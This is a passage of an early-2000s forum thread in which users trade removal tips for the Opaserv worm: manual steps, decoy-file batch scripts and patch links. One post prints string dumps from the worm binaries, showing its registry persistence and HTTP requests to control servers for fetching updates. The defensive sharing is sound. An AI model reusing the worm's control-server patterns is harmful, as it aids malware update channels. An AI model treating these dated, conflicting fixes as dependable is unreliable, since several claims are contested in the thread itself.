6. unshared drive c 7. tried to go to regedit but couldn't figure that out so didn't change anything. Same with sysedit. 8. ran msconfig and removed scrsvr.exe from the sys, win, start and some other tab I think too in there. 9. removed scrsvr.exe app from zone alarm permissions totally and rebooted system 10. searched again for all the files. found scrsvr.0 in c:\_restore I could not delete it, remove it or anything else. 11. used 12 ghosts software to shred the file. again it said in use or locked and tagged it to be shredded at next start up. 12. rebooted system 13. searched for all files as before and variances or partials with * wildcard and found nothing. now to test to make sure it is gone. 14. shared drive c again with password for read and another for full. 15. reconnected to internet. 16. browsed around a bit. opening and closing ie and searching websites. 17. internet traffic appeared normal. connection transfer rate was good. no zone alarm requests. when doing nothing no pings signaling and indicator lights stayed blank. Today, booted and rebooted throughout the day and searched for scr variables and files created today. nothing. same with tmp. Looks like I eradicated it totally with the "polgar fix" :-) I did not delete any print files or sharing files. I did not create a fake scr files. I only turned off sharing for a while to do the Polgar Fix. I turned it all back on with passwords. I also have some firewall built into the ethernet hub box and zone alarm. somehow this virus got passed both AND was able to DISABLE A SECURITY PROGRAM! (zone alarm component). I want to thank everyone in this thread. The "Polgar Fix" is a collaboration of almost everyone's ideas and the addition of a couple more of my own. On a hunch I used the 12 ghosts shredding program as it seems the virus figures ways to repair itself. This way it shreds and rewrites many times (I have it set to 20) then writes 000's and truncates it says. whatever that means. That way nothing is left there to find and fix. If you use this procedure and it works for you please let me know. I just like to know when things go right. I ALWAYS here when they go wrong heh-heh. It should work fine for all of your various setups and be able to get your networks running and shared again. thanks to everyone here for all the help!!!

0

Sorry for my bad english, i talk in spanish.... I share MY SOLUTION with the Opaserv virus - hope it work for all :) - the virus write a file in the root directory C:\ named kernel32.dll this is the same name and size of the kernel32.dll in windows\system directory but in the boot proccess windows find first this one. this file is the guilty of download the file scrsvr.exe from the internet. the solution. Power down the machine. Boot, F8 in the menu select: command line only delete o rename the file kernel32.dll in c:\ Reboot the machine Hope works :) Best Regards Pablo

0

I'm also battling this worm and want to thank everyone for their help and suggestions. I've tried using Symantec's tool; followed directions, it found the virus removed all traces and innoculated my system. At least that's what it reported, following day I boot and ZoneAlarm alerts me to scrsvr.exe wanting access. Following most of your suggestions I think I'm okay now but did find one piece of info I'd like to share. While going through ZoneAlarm and eleminating scrsvr.exe from ZA's porgram list, I found an entry I didn't recognize. ZA has it listed as the program Micorsoft QMgr and pointing to the file loadqm.exe which is part of the worm. Hope this helps! Tom

0

Tom, loadqm.exe and Microsoft QMgr aren't part of the worm!!! well of the Opaserv worm, maybe the Microsoft Messenger Worm :) put in google "loadqm.exe" and see more explanations Best Regards Pablo

0

hi all, DEFINITIVE SOLUTION TO THIS, the virus consists of the scrsvr.exe tmp.ini entries in win.ini and the registry that i think you are all aware of METHOD OF ACTION when the infected file comes in it sends out the infected machines IP address - what this means, is that even if you format your machine and reinstall everything, you will be reinfected within mins, if you re-connect to the net -when your av software scans and says your machine is clean, its true ( assuming you have virus definitions new enough to detect it) the virus systematically scans all IP addresses on port 137 ( netbios ) and attempts to connect - it WILL connect unless you have the MS share level vulnerability patch AND you have added a password to the C:\ share OR you can use a firewall and block port 137 from all ip addresses because the virus systematically checks all ip addresses, there is the potential for all win 9x machines( without the MS patch) to become infected - this does not affect win NT/2000 as it doesnt have a share level permission check : http://vil.nai.com/vil/content/v_99729.htm

0

Pablo, I stand corrected. :) In my defense, I did find the loadqm and srcsvr in my startup. I KNOW it was not there before I was infected and have not installed any MS programs in the last year outside of security patches. That and seeing a post elsewhere that indicated loadqm to be part of the worm led me to my post. Anyway, since the infection I've had a couple of curious problems and wondering if anyone else has had them. One when doing a Goggle search, all the sites that match the subject would be Korean, Brazilian, or French. Very few, if any, US sites. I have since set english in Google's preferences. Also, file transfers are either extremely slow (0.13K/s)and/or get disconnected. This happens on uls and dls. Anyone experiencing anything silmilar? Tom

0

Thanks forn that info Nick,I was unaware of need for this patch-Can anyone recommend a good firewall-I have ZAP but it doesn't seem to protect me from trojans seeking to update- Thanks to all

0

Tom - I experienced the same problem with Google - even though my preference was set to english. I also had a problem with .jpg and .doc files duplicating themselves and showing up in places they didn't belong.

0

Pest Patrol found a new one identified as a virus source c:\windows\favourites\msn.com.url anyone else got this one? File does not exist on other machines which have not been infected. This is not what I call fun!!!!!

0

that is just the msn website! it is not a virus. you probably added it on that machine while doing the fix and getting hte new security patch that fixes the vulnerability. or microsoft added it automatically wihtout you knowing or the user had it before.

0

I don't recollect how I became involved with SCRSRV.exe and it's bad business, but after a few hours here's what I came up with on a W98SE machine running Sygate Personal Filewall: 1) SCRSVR.exe is _NOT_ the only file associated with the virus. Search for ALEVIR.exe and BRASIL.exe as well (reasons follows). 2) I didn't go after the hows and whys of registry keys & values 3) I _was_ seeing SCRSVR.exe trying to do I/O to the internet via Sygate, and a number of times killed it right there and then, only to see it pop up as others here have mentioned. 4) I haven't looked into all of the suggestions made above, here, but I offer the data following as a help to them that understand it. 5) Rebooting the OS to control prompt, do the following: a) rename scrsvr.exe scrsvr.!x! or something as you wish b) rename alevir.exe alevir.!x! c) rename brasil.exe brasil.!x! d) do these commands: copy drwatson.exe scrsvr.exe (and) attrib +r scrsvr.exe (and) copy sol.exe alevir.exe (and) attrib +r alevir.exe (and) copy notepad.exe brasil.exe (and) attrib +r brasil.exe I used an old MS-DOS utility "XtreePro Gold" to do binary views on the 3 files mentioned above, and found they were all tied to "Opasoft". Fortunately, I was able to cut and paste those binary views to see here. Starting at ***===***===*** are the views, somewhat edited for readability, for the files in question. I haven't been able to raise www.opasoft.com or www.n3t.com.br on the 'net. Good Luck! rjm@soltec.net ***===***===*** FILE: scrsvr.exe ScrSvr31415 KERNEL32.dll RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\Internet Settings ScrSvr ScrSvrOld ProxyEnable ProxyServer \ScrSvr.exe ScrSin.dat ScrSout.dat scrupd.exe www.opasoft.com GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1 Host: www.opasoft.com GET http://www.opasoft.com/work/lastver HTTP/1.1 Host: www.opasoft.com GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1 Host: www.opasoft.com POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1 Host: www.opasoft.com OK PLAIN CIPHER1 KEY ___ WINDOWS\scrsvr.exe WINDOWS\win.ini c:\tmp.ini c:\windows\scrsvr.exe, windows run CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ! LOCALHOST ***===***===*** FILE: alevir.exe Alevir31415 KERNEL32.dll RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\Internet Settings Alevir AlevirOld ProxyEnable ProxyServer \Alevir.exe Alevir.dat AleSout.dat puta!!.exe www.n3t.com.br. GET http://www.n3t.com.br/work/sscheduler.php?ver=01&task=newzad&first=0 HTTP/1.1 Host: www.n3t.com.br. GET http://www.n3.com.br/wwwork/lastver HTTP/1.1 Host: www.n3t.com.br. GET http://www.n3t.com.br/wwork/scrsvr.exe HTTP/1.1 Host: www.opasoft.com POST http://www.n3t.com.br/wwork/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1 Host: www.n3t.com.br. OK PLAIN CIPHER1 KEY ___ WINDOWS\alevir.exe WINDOWS\win.ini c:\put.ini c:\windows\alevir.exe, windows run CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ! LOCALHOST ***===***===*** FILE: brasil.exe Opasoft Crypted BÆ{__y AlevirusSCS! ]&-K",D@ 6S î`q+¦+_ LocalÖl Ge•___tCurrentPr ess ExitTh{ï-vad SFi+Poi -¦+ver R! Ev. vs_k! C, Mu }l _xA^F e]Modu+¦_»#'NameARjio ty_+w_Clap EndOfL3µ_¦vHa Ahgis~'+d¡-rLú¿GI÷¦__vz fa+-²Object¦ep83+7¢aëL_Cx¡-_b;_m¦_\úD A y#De*_¦7_0 gztå_a-% _l- l_`r+t mpi ,_6_OnW%dowsrtå+l Ö_[öVk' . ue$kQ#+5JX +IKey0ï-å

0

Maggie I have followed your instructions in response 12 and it seems to have done the trick A whole hour on line without a warning from NAV telling me that it has found a scrsvr.exe or a Brasil.exe, Marco!.exe etc / bliss !! I have been fighting this one since the beginning of October Thankyou John Aldred

0

NAV crates a temp file - when a file is quarentined or flagged as a virus a copy of that file is sent to the temp file (usually held in th a all users profile) This is then picked up every time AV scans so NAV thinks its still there - This bug is fixed in SAYEE 8.0.2 Solution - delete any files found in the temp dir.

0

There has been a lot of discussion about this worm on the security and virus section of this website. To sum up, many of us have determined that no anti-virus software can fully remove Opaserv! You have to close off certain ports on your computer! For details on how to get a fix on where the virus will stop coming back, check out this link: http://www.computing.net/security/wwwboard/forum/2985.html Feel free to email me if you have any problems removing this virus. Brad Peterson b_peterson@yahoo.com

0

This thing is insidious. I tried the Kaspersky F-Secure solution and it didn't take care of it. It created at least 4 different executables in my C:\Windows directory: marco!.scr, scrsvr.exe, alevir.exe, brasil.pif, and brasil.exe. It also created Registry entries to execute them and also modified my win.ini file to run these as well. To top it off, it created two more ini files in my C: directory: gay.ini and put.ini. Trend Micro has a good page which offers a manual solution which worked for me. http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_OPASERV.F I also disallowed sharing of my C: drive. Good luck to all.\ Bill

0

To clean your system and to prevent it to be infected again, try all suggestions above and then, execute this patch, it should fix the problem and the WORM WILL NOT COME BACK AGAIN!! http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-072.asp ...and choose the link that fit with your Operating System!

0

So in SIMPLE terms, can n e one say how to get rid of this worm for GOOD??? its starting to bug me bad! thanx, JD

0

Well this worm is really annoying me. I've got the 'H' version apparently, according to NAV2002, which also has brasil.pif, alevir.exe and marco!.scr files. What I've done so far... Changed the name of my C drive share to Main. Shared my files with the NetBEUI protocol, as this worm apparently spreads via TCP/IP. Created a blank exe file called scrsvr.exe in C:\Windows\ I'm in the process of installing ZoneAlarm Pro, seemingly Norton Personal Firewall didn't stop it going through. It seems to me however that despite having about 3 different filenames that the virus is known as, they all start from scrsvr.exe, so since I created this blank file, I've had no problems. I wish Symantec would get a move on though!! PB

0

OK, I've knocked up a quick fix for the virus... I hope! You need to make sure that you've temporarily removed the files via a virus checker, and in the time where they are about to reappear, run this (Turn it into a batch file by copying the text into notepad, save as, type: all files, name: fix.bat Good luck everyone! Lets lose this bloody worm! ===== CUT AFTER THIS LINE ====== @ECHO OFF ECHO Opaserv fix ECHO Peter Butler 2002 ECHO This tool will create fake files to simulate the Opaserv.worm virus ECHO Creating files... @ECHO ON IF EXIST %WINDIR%\scrsvr.exe DEL %WINDIR%\scrsvr.exe IF EXIST %WINDIR%\brasil.pif DEL %WINDIR%\brasil.pif IF EXIST %WINDIR%\BRASIL.exe DEL %WINDIR%\BRASIL.exe IF EXIST %WINDIR%\MARCO!.SCR DEL %WINDIR%\MARCO!.SCR COPY %WINDIR%\NETWORK.TXT %WINDIR%\SCRSVR.exe COPY %WINDIR%\NETWORK.TXT %WINDIR%\BRASIL.PIF COPY %WINDIR%\NETWORK.TXT %WINDIR%\BRASIL.exe COPY %WINDIR%\NETWORK.TXT %WINDIR%\MARCO!.SCR ATTRIB +R %WINDIR%\SCRSVR.exe ATTRIB +R %WINDIR%\BRASIL.PIF ATTRIB +R %WINDIR%\BRASIL.exe ATTRIB +R %WINDIR%\MARCO!.SCR @ECHO OFF ECHO Replacement completed. ECHO Good luck

0

Looked at your solution peter and was surprised it worked only one sidemark your solution goes to version H from the opaserv virus, its already at k at the moment. I altered your batch file and made some corrections, and the algemeen.txt is because i am a dutch user, if you have an english version of windows thamn you can use network.txt like you said. --------------------- @ECHO OFF ECHO Opaserv fix ECHO Creator: BCS Business Systems ECHO By: Bert-Jan van Schalkwijk ECHO Original:Peter Butler 2002 ECHO This tool will create fake files to simulate the Opaserv.worm virus ECHO Creating files... @ECHO ON set path=c:\windows\command IF EXIST %WINDIR%\scrsvr.exe DEL %WINDIR%\scrsvr.exe IF EXIST %WINDIR%\brasil.pif DEL %WINDIR%\brasil.pif IF EXIST %WINDIR%\BRASIL.exe DEL %WINDIR%\BRASIL.exe IF EXIST %WINDIR%\MARCO!.SCR DEL %WINDIR%\MARCO!.SCR IF EXIST %WINDIR%\alevir.exe DEL %WINDIR%\alevir.exe IF EXIST %WINDIR%\instit.bat DEL %WINDIR%\instit.bat COPY %WINDIR%\algemeen.TXT %WINDIR%\SCRSVR.exe COPY %WINDIR%\algemeen.TXT %WINDIR%\BRASIL.PIF COPY %WINDIR%\algemeen.TXT %WINDIR%\BRASIL.exe COPY %WINDIR%\algemeen.TXT %WINDIR%\MARCO!.SCR COPY %WINDIR%\algemeen.TXT %WINDIR%\ALEVIR.exe COPY %WINDIR%\algemeen.TXT %WINDIR%\INSTIT.BAT ATTRIB +R %WINDIR%\SCRSVR.exe ATTRIB +R %WINDIR%\BRASIL.PIF ATTRIB +R %WINDIR%\BRASIL.exe ATTRIB +R %WINDIR%\ALEVIR.exe ATTRIB +R %WINDIR%\INSTIT.BAT ATTRIB +R %WINDIR%\MARCO!.SCR @ECHO OFF ECHO Opaserv Files Replacement completed. ECHO Good luck, BCS Business Systems

0

Had the same Opasrv worm problem.All the related files are, Brasil.pif,instit.bat,marco!.*,scrsvr.exe,alevir.exe,tmp.ini.gay.ini,put.ini. Steps to get rid of it, 1)Unshare your C: drive 2)Delete all the above mentioned files.While deleting if get an "Access denied" message then you have to use a Process Viewer tool that allows to view and kill proccesses(Ms Visual Studio Tools has one) 3)Clean the run line in Win.ini 4)Clean the text in the Registry key....by now everybody must be knowing the location of the key. How does the Virus get to your system, 1)You must have read from most anti-virus websites, that it is due to a remote infection.The helper is MPREXE.exe a Microsoft file(residing in C:\Windows\System) that allows incoming Network requests to be routed to a network provider.Let this file be undisturbed only make sure that you Unshare C: so that it is not accessible remotely.(as would be in case it's a proxy/ dial up machine). 2)Another possibility could be the below non-existant sites, to which a machine keeps connecting to 1)www.gwmnet.com.br/marcos/gayer.php 2)www.opasoft.com/work/scheduler.php 3)www.instituto.com.br/attackDoS.php 3)www.n3t.com.br/work/sscheduler.php If it's a Proxy then check out the requests with the GET statement, if you find any pointing to the above URLs , then block them in the proxy settings. If anyone has any knowledge about these phantom URLs and what initiates a client to connect to them, please let it be posted. regards Savitha

0